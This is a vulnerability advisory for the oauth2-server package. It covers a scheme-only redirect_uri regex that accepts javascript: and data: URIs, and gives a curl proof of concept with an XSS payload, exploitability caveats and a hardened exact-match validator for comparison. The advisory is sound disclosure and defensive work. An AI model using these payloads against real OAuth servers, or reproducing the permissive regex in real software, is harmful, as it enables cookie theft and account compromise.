Affected Package: oauth2-server
Version: v3.1.1 (Latest)
Vulnerability Type: Open Redirect / Cross-Site Scripting (XSS)
The oauth2-server library relies on an overly permissive Regular Expression to validate the redirect_uri parameter during the OAuth authorization flow. The check only tests that the value starts with a syntactically valid URI scheme, so an attacker can supply dangerous schemes that execute in the browser context (e.g., javascript:, data:) as redirect targets.
In lib/validator/is.js (line 10), the library defines the uri validation regex as follows:

// Vulnerable Regex
uri: /^[a-zA-Z][a-zA-Z0-9+.-]+:/

This regex accepts any syntactically valid RFC 3986 scheme, but a scheme check is not the validation OAuth 2.0 calls for: RFC 6749 §3.1.2 requires the redirection URI to be absolute and pre-registered, RFC 8252 §7 defines which redirect URI forms are acceptable for native apps, and the OAuth 2.0 Security Best Current Practice (RFC 9700) requires exact string matching against the registered value. Because the regex inspects nothing but the scheme syntax, it also passes schemes that execute code in the browser context, such as javascript: and data:.
- Setup: Initialize a standard oauth2-server instance.
- Attack: Send an authorization request containing a malicious redirect_uri:

  curl -v "http://localhost:3000/oauth/authorize?response_type=code&client_id=test&redirect_uri=javascript:alert(document.cookie)"

- Result: The server validates the URI as "correct" and issues a 302 Redirect to the malicious payload:

  HTTP/1.1 302 Found
  Location: javascript:alert(document.cookie)?code=...

If a developer relies on this library to validate Redirect URIs (which is the default behavior), an attacker can perform XSS attacks by tricking a user into clicking a link that redirects to a javascript: payload.

Two caveats affect exploitability. First, is.uri is only the scheme check: the authorize handler also compares redirect_uri with the client's registered redirectUris returned by the model, so the PoC presupposes that a javascript: value made it into that list (for example through a registration flow that itself trusts is.uri). Second, current browsers refuse to follow a Location header to a javascript: URL, so the 302 alone does not execute the payload in Chrome or Firefox; the flaw remains that a scheme-syntax regex stands in for the exact, scheme-restricted match OAuth 2.0 requires, and any client or rendering path that does honour the URI (such as a consent page that links to it) is exposed.
The oauth2-server package is unmaintained. Users are strongly advised to migrate to the community-maintained fork: @node-oauth/node-oauth2-server, which is actively supported.
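To make the contrast concrete, here is an added example (not code from oauth2-server or from the @node-oauth fork) that puts the library's regex next to a redirect_uri validator doing what RFC 6749 §3.1.2 and RFC 9700 expect: parse the value, allow only an approved scheme, reject fragments and embedded credentials, and require an exact string match against the client's registered URIs. The client record and its redirectUris value are constructed for the demo; the https-only scheme allow-list is a policy assumption, not something the library imposes.

```javascript
// Added example (not code from oauth2-server or the @node-oauth fork): the
// library's scheme-only regex next to an exact-match redirect_uri validator
// of the kind RFC 6749 sec. 3.1.2 and RFC 9700 call for.

// The regex from lib/validator/is.js: any RFC 3986 scheme followed by ':'.
const VULNERABLE_URI_RE = /^[a-zA-Z][a-zA-Z0-9+.-]+:/;

function vulnerableIsUri(value) {
  // Passes javascript:, data:, vbscript:, ... as long as the scheme is well formed.
  return VULNERABLE_URI_RE.test(value);
}

// Constructed client record. node-oauth2-server models return the registered
// URIs in a `redirectUris` array; the values here are made up for the demo.
const EXAMPLE_CLIENT = {
  id: 'test',
  redirectUris: ['https://app.example.com/callback'],
};

// Schemes a web client may use as a redirect target. Restricting to https is a
// policy choice for this example; loopback or private-use schemes for native
// apps (RFC 8252 sec. 7) would need their own rules.
const ALLOWED_SCHEMES = new Set(['https:']);

function hardenedIsValidRedirectUri(value, client) {
  let url;
  try {
    url = new URL(value);          // throws on relative or malformed input
  } catch {
    return false;
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return false;          // rejects javascript:, data:, ...
  if (url.hash !== '') return false;                             // RFC 6749 sec. 3.1.2: no fragment
  if (url.username !== '' || url.password !== '') return false;  // no embedded credentials
  // Exact string comparison with a registered value: no prefix matching,
  // no normalisation, no wildcard hosts.
  return client.redirectUris.includes(value);
}

// Runs both checks over one candidate so the difference is visible side by side.
function compare(value, client = EXAMPLE_CLIENT) {
  return {
    value,
    vulnerable: vulnerableIsUri(value),
    hardened: hardenedIsValidRedirectUri(value, client),
  };
}

// Demo: the payload from the PoC above, a data: URI, the registered URI,
// a look-alike host, and a non-URI string.
for (const candidate of [
  'javascript:alert(document.cookie)',
  'data:text/html,<script>alert(1)</script>',
  'https://app.example.com/callback',
  'https://app.example.com.attacker.example/callback',
  'not a url',
]) {
  const r = compare(candidate);
  console.log(`${r.value}\n  vulnerable regex: ${r.vulnerable}  hardened check: ${r.hardened}`);
}
```

Run it with node. The vulnerable regex accepts the javascript: and data: payloads because their scheme is well formed; the hardened check rejects them on scheme alone and additionally refuses the look-alike host because it is not a registered value. Where a model hook for redirect_uri validation is available (the @node-oauth fork's model documentation lists an optional validateRedirectUri(redirect_uri, client) method), a check of this shape is what belongs there. Native apps using loopback redirects would additionally need port-insensitive matching per RFC 8252 §7.3, which this web-oriented example deliberately leaves out.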